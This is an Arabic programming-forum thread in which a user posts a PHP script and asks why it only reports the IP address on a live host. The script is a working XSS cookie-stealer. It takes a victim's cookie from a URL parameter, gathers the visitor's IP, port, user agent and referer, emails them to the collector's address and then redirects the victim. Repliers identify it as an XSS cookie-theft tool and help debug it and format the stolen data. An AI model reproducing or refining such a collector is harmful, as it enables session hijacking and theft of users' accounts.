• 0

كود php لا يعمل سوى على سيرفر محلي، ما المشكلة؟

عندما اضع الكود التالي في php في السيرفر المحلي يتم تنفذ الكود بصورة صحيحة ويطبع كل القيم ولكن عندما ارفع الموقع على استضافة والكود ايضا على استضافة لاينفذ هذا الكود بصورة صحيحة  فيظهر فقط الIP . مالسبب؟

$Msg="IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE:  $cookie";

 

انشر على الشّبكات الاجتماعية


رابط هذه المساهمة
  • 1

اعدادات جهازك تختلف عن الاستضافة افصل بين النص والكود كالتالي

$Msg="IP:".$ip."| PORT: ".$rem_port. "| HOST:". $rem_host. "| Agent: ".$user_agent. "| METHOD: ".$rqst_method. "| REF: ".$referer."| DATE{ : }". $date." | COOKIE:".  $cookie;

 

انشر على الشّبكات الاجتماعية


رابط هذه المساهمة
  • 0

اخي عندما اضعها بهذه الصورة يكون الناتج كالتالي

IP:37.239.128.15| PORT: | HOST:| Agent: | METHOD: | REF: | DATE{ : } | COOKIE:

ولايطبع كل القيم 

تمّ تعديل بواسطة java

انشر على الشّبكات الاجتماعية


رابط هذه المساهمة
  • 0

ضع كود الصفحة اللتي لديك 

 

وساقوم بالتعديل عليها بما يلزم 

1 شخص أعجب بهذا

انشر على الشّبكات الاجتماعية


رابط هذه المساهمة
  • 0
<?php
 $YourMail = "x@hotmail.com"; 
 	if(isset($_GET['index'])){
  	$cookie = $_GET['index'];
	$path = getenv('PATH');
	$date=date ("l dS of F Y h:i:s A"); 
	
    $rem_port = $_SERVER['REMOTE_PORT'];  
	$rem_host = $_SERVER['REMOTE_HOST']; 
	$user_agent = $_SERVER['HTTP_USER_AGENT'];  
	$referer = $_SERVER['HTTP_REFERER'];
	$redirect = "https://www.google.com";
	
 	Echo '<script>document. Location="'. $redirect.'"</script>';
 	}
 	else print '
 	<body bgcolor="000000">
 <center>
 	<b><font color="red">404</font></b><br></center>';
if (getenv('HTTP_X_FORWARDED_FOR')) 
{ 
$ip=getenv('HTTP_X_FORWARDED_FOR'); 
} 
else { 
$ip=getenv('REMOTE_ADDR'); 
}
$Msg="IP:".$ip."| PORT: ".$rem_port. "| HOST:". $rem_host. "| Agent: ".$user_agent. "| REF: ".$referer."| DATE{ : }". $date." | COOKIE:".  $cookie;
  	$Send = mail ($YourMail,"cookie",$Msg);
	If ($Send) {
 	if ($redirect <> ""){
 	header("location:".$redirect);
 	}
}

?>

علما ان هذا الكود اعمل عليه في موقع من تصميمي لاختبار ثغرة وليس استخدام خبيث ضد المواقع

انشر على الشّبكات الاجتماعية


رابط هذه المساهمة
  • 0

كودك صحيح 

 

المشكله اللي تواجهك 

انت لافتحت الرابط 

file.php

يرسل فقط الايبي على الايميل بسبب الشرط

if(isset($_GET['index']

لو تفتح الرابط مثل كذا 

file.php?index=1

بيرسل كامل المعلومات صحيحه 

 

1 شخص أعجب بهذا

انشر على الشّبكات الاجتماعية


رابط هذه المساهمة
  • 0

انا واضع هذا الكود على استضافة واضع كود جافاسكربت في الموقعي لكي يرسل قيمة الكوكيز لهذا الكود وعندما اضع هذا المتغيرات بهذه الصيغة يرسل المعلومات كاملة ولكن تكون بشكل مكدس بلافواضل انا لاابغي غير ترتيب المعلومات 

$Msg=$cookie.$path.$date.$ip.$rem_port.$rem_host.$user_agent.$referer;

احتاج ان تكون مرتبه كما هي في هذا http://www.go4expert.com/articles/stealing-cookie-xss-t17066/

وشكراجزيلا لك على المساعدة 

تمّ تعديل بواسطة java

انشر على الشّبكات الاجتماعية


رابط هذه المساهمة
  • 0

عزيزي  انا من شفت الكود عرفت انه   لاستغلال ثغرة Xss  ولذلك تم استخدام المتغير  index 

لكي ترسل القيمة ويتحقق الشرط بحيث يرسل كود جافا سكربت عباره عن document.cookie

 

 لكن لو اردت المعلومات تاتي تحت بعض تستخدم التنسيق html

مثلا <br />

كل وحده بسطر جديد 

$Msg="IP:".$ip."<br />| PORT: ".$rem_port. "<br />| HOST:". $rem_host. "<br />| Agent: ".$user_agent. "<br />| REF: ".$referer."<br />| DATE{ : }". $date." <br />| COOKIE:".  $cookie;

 

1 شخص أعجب بهذا

انشر على الشّبكات الاجتماعية


رابط هذه المساهمة
  • 0

عذرا اخي لم اقصد انك لم تفهم الموضوع ولكن اردت التوضيح اكثر لاني لم افهم اجابتك السابقة  اي فايل تقصد بالضبط هذه  الاجابة 

بتاريخ 44 دقائق مضت قال KSA brg:

و تفتح الرابط مثل كذا 

file.php?index=

وايضا عندما اضع  <br /> ايضا لايتم تنفيذه بشكل صحيح 

شكرا جزيلا لك وعذرا على الاطالة 

انشر على الشّبكات الاجتماعية


رابط هذه المساهمة
  • 0

انت حفظت الملف باسم معين 

فرضا انك حفظته باسم file.php

 لاجيت تفتحه بالمتصفح 

بيكون كذا 

http://localhost/file.php?index=cookei

طبعا هو الكود مصمم لسحب الكوكيز يستقبل عن طريق المتغير 

لكن للتجربه  لنجاح الكود تضع المتغير اندكس بعد اسم الملف 

تمّ تعديل بواسطة KSA brg

انشر على الشّبكات الاجتماعية


رابط هذه المساهمة

يجب أن تكون عضوًا لدينا لتتمكّن من التعليق

انشاء حساب جديد

يستغرق التسجيل بضع ثوان فقط


سجّل حسابًا جديدًا

تسجيل الدخول

تملك حسابا مسجّلا بالفعل؟


سجّل دخولك الآن